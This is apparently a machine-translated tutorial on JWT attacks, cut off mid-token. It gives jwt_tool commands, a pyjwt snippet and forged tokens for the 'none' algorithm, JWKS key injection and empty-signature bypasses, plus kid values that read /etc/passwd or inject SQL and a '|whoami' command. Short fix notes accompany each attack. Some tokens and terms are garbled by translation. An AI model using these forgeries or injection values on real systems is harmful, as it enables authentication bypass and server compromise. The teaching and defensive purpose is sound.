Title: Summary of detailed explanation of JWT authentication attacks

0x01 JWT Basics

1. Introduction to JWT JWT is the full name of JSON Web Token, and uses json objects as carriers to transmit information. Usually used for identity authentication and information exchange. JWT can sign itself using a key (HMAC algorithm) or RSA or ECDSA's public/private key 2. JWT format Whenever a user accesses a resource in the site, the corresponding request header authentication defaults to Authorization: jwt. JTW token authentication starts with eyJ. The header of JWT's data is as follows: The data of JWT is divided into three parts: header (Header), payload (Payload), and signature (Signature) three parts are separated by English periods. Separated, the content of JWT is encoded with Base64URL. Here is an example of a specific token: eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJkdWJoZTEyMyJ9.XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwT xGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnzh0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJIl8B3Nc77gVIIVvzI9N_klPcX5xsuw9SsUfr9d99kaKyMUSXxeiZVM-7os_dw3ttz2f-TJSNI0DYprHHLFw (1) The header contains information about JWT configuration, such as signature algorithm (alg), token type (JWT), encryption algorithm (alg), or key files used by the algorithm (used when the server needs multiple key files). Header: eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQbase64 decoding: {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851','typ':'JWT','alg':'RS256'} Where the token authentication type is JWT and the encryption algorithm is RS256 (2) Payload Payload is used to store user data, such as username (test123) Payload: eyJzdWIiOiJkdWJoZTEyMyJ9 (3) Signature Signature requires the encoded header and payload and a key we provide, and then the signature algorithm specified in the header is usually RS256 (RSA asymmetric encryption and private key signature) and HS256 (HMAC SHA256 symmetric encryption) algorithms. The purpose of signature is to ensure that JWT has not been tampered with. Here is an example of code that uses HS256 to generate Jw=WT.

HMACSHA256(base64Encode(header) + '.' + base64urlEncode(payload),secret)Signature:XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwTxGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnz h0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJIl8B3Nc77gVIIVvzI9N_klPcX5xsusw9SsUfr9d99kaKyMUSXxeiZVM-7os_dw3ttz2f-TJSNI0DYprHHLFw

0x02 JWT Common Security Issues

1. The signature algorithm can be modified to none (CVE-2015-9235) JWT supports setting the algorithm to "None". If the "alg" field is set to " None”, then the signature will be empty, so any token is valid. One: the original payload data is not changed and the signature algorithm is not checked based on the unchecked signature algorithm eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvZGVtby5zam9lcmRsYW5na2Vt cGVyLm5sXC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.LlHtXxVQkjLvW8cN_8Kb3TerEEPm2-rAfnwZ_h0pZBghttps://jwt.io/ Use jwt_too to attack (this tool is suitable for tokens obtained without changing the original payload data without signing algorithm) python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvZGVtby5zam9lcmRsYW5na2VtcGVyLm5sXC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.LlHtXxVQkjLvW8cN_8Kb3TerEEPm2-rAfnwZ_h0pZBg -X a Get tokeneyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6IndvcmxkIn19.Use the obtained token Confirm authentication request http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php Method 2: The original payload data is changed based on the unchecked signature algorithm. Use python3's pyjwt module to modify the data in the payload, use the none vulnerability to regenerate the token

import jwt

encoded=jwt.encode({'iss': 'https://demo.sjoerdlangkemper.nl/','iat': 1662737965,'exp': 1662739165,'data': {'hello': 'admin' }}, '', algorithm='none')

encoded

'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWluIn19.'

toekn:eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWluIn19. Repair solution: JWT The configuration should only specify the required signature algorithm 2. Not verified signature Some servers do not verify the JWT signature. You can try to modify the payload and then directly request the token or delete the signature directly and request it again to see if it is still valid. Modify payload data through online tool jwt.io

Then the obtained token performs authentication request eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWlucyJ9fQ.Sv4QGoIbSQSP7Yeha2Qbhk10za6z42Uq dZuv1IUmPnU or delete signature, and request toekn authentication again :eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8uc2pvZXJkbGFuZ2tlbXBlci5ubC8iLCJpYXQiOjE2NjI3Mzc5NjUsImV4cCI6MTY2MjczOTE2NSwiZGF0YSI6eyJoZWxsbyI6ImFkbWlucyJ9fQ. Repair solution: JWT The configuration should specify only the required signature algorithm 3. JWKS public key Injection —— forgery key (CVE-2018-0114) Create a new RSA certificate pair, inject a JWKS file, and the attacker can sign the token with a new private key, include the public key in the token, and then let the service use the key to verify the token. The attacker can forge the JWT by deleting the original signature, adding a new public key to the header, and then signing with the private key associated with the public key. eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X i

The token certification obtained: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJqd3RfdG9vbCIsInVzZSI6InNpZyIsImUiOiJBUUFCIiwibiI6IjFQZDNGTXBFUVM0SU15WjJ4Tlh5UEJrdnRCWnBEZG8wakFGTEtwemdfSEM1ZE1vU3ZRR1pDWVpwZlJpMlpaTDZoUkNFNW9DUWRHeGd0MzZQZ VV2MERhTG8zLVJacGtzcFhpT3QzWU00RDU3SDdvQllEWVExcFh1dHNBRzliaXJ6SENGM2l0alg1S0Zha2ljTkw5cGsySnloRDRTU1BoOUVQMkNQVHExMV9sV1o1N1ZacGFMdDJxLXB1THQ3SWNSYnhmbEhlaUZxRTlUSUtnRW1scExBVjBRajFiWEk3bVhMZEQxT0NyS2w0SDdqbEFlWG5LY0xQTEJnb2Y4RzBTeXRGSU1PN1 BvQVpUZUVHVHJiZmktNlZKNGNrcUNfdjJYQUR1WHBTSU5mOFBrbXZXckdjTk1XaEEwVXZvcVJCdnFHR0ZBWnBRT2dhR1VUVktvdzJOTXllUSJ9fQ.eyJsb2dpbiI6InRpY2FycGkifQ.JGqsWHbZaas_4DAfbtkK-DOBpueDrWw3tZuBonKUleIoa_Ll6yMrwzvJ0RjqMH2hIlhKrixTce7RtJPiqEJAHv_5eMF5G3qkU2jDb M6Un19dlTRTBfCh3FIKMrkh1P-CUUw7AXO2cae1GWNvGK74d3VNulgBK5Qy4uZryrzJUO-7Dx5vHUfV3eJ8J-FRRFqDO_DYAjB7cbWHuB4RHcUkIwJ9Fz3ze5JIKMXrcmZIEvCssUxjaYIb7Rpm-lI34yWSQbOGA82glkt4xqjulZZqF7Eysu1Q3JNUqPiD24T1zrE7CHm3btpBzW4CSRPrs8z5E-GUgZApH_vodp3mLxa9tA

Fix: JWT configuration should clearly define which public keys to accept for verification 4. Empty signature (CVE-2020-28042) delete the signature from the end of the token python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X n token authentication obtained: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ. Repair solution: JWT library should fix this problem 4. Sensitive information leakage JWT's header header base64 decoding can leak sensitive data such as key files or passwords or injection vulnerabilities eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ base64 decoding: {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851','typ':'JWT','alg':'RS256'} where the authentication type is JWT, the encryption algorithm is RS256, kid specifies the encryption algorithm's key, the path of the key KID is: keys/3c3c2ea1c3f113f649dc9389dd71b851k, then search for /key/3c3c2ea1c3f113f649dc9389dd71b851k and /key/3c3c2ea1c3f113f649dc9389dd71b851k.pem5.KID Parameter Vulnerability (1) Any file read key ID (kid) is an optional header, a string type, used to represent a specific key present in the file system or database, and then use its contents to verify the signature. This parameter is helpful if there are multiple keys for signing the token, but can be dangerous if it is injectable, as the attacker can point to a specific file whose content is predictable. The kid parameter is used to read the key file, but the system does not know whether the user wants to read the key file. Therefore, if the attacker does not filter the parameters, the attacker can read any file in the system. { 'typ': 'JWT', 'kid': '/etc/passwd', 'alg': 'HS256'} token:eyJ0eXAiOiJKV1QiLCJraWQiOiIvZXRjL3Bhc3N3ZCIsImFsZyI6IkhTMjU2In0.eyJsb2dpbiI6InRpY2FycGkifQ.CPsfiq-_MnwM7dF6ZZhWPl2IbKgF447Iw6_EgRp6PFQ Note: /dev/null in linux system is called an empty device file and never returns anything. You can bypass reading any file python3 jwt_tool.py JWT -I -hc kid -hv '././dev/null' -S hs256 -pc login -pv'ticarpi' Parameter Description: -I Inject or update the current declaration, -hc kid sets kid in the existing header, -hv sets its value to '././dev/null', -pc Sets the declaration variable name of payload, such as: login, -pv Sets the value of the declaration variable login is 'ticarpi' or you can use any file present in the web root directory, such as CSS or JS, and use its content to verify the signature.

python3 jwt_tool.py -I -hc Kid -hv 'path/of/the/file' -S hs256 -p 'file content' (2) SQL injection kid can also extract data from the database. At this time, it may cause SQL injection attacks. By constructing SQL statements to obtain data or bypass signature verification { 'typ': 'JWT', 'kid': 'key1111111111' || union select 'secretkey' --', 'alg': 'HS256'} :eyJ0eXAiOiJKV1QiLCJraWQiOiJrZXkxMTExMTExMScgfHwgdW5pb24gc2VsZWN0ICdzZWNyZXRrZXknIC0tIiwiYWxnIjoiSFMyNTYifQ.eyJsb2dpbiI6InRpY2FycGkifQ.I2oD_v7UvBIqilLcyuqP_HDY28yp1IFZeTs90fk-Tdc (3) Command injection is not strict in filtering kid parameters, but the utilization conditions are relatively strict. If the server backend uses Ruby and uses the open function when reading the key file, the command injection may be caused by constructing parameters. { 'typ': 'JWT', 'kid': 'keys/3c3c2ea1c3f113f649dc9389dd71b851k|whoami', 'alg': 'HS256'} token:eyJ0eXAiOiJKV1QiLCJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxa3x3aG9hbWkiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI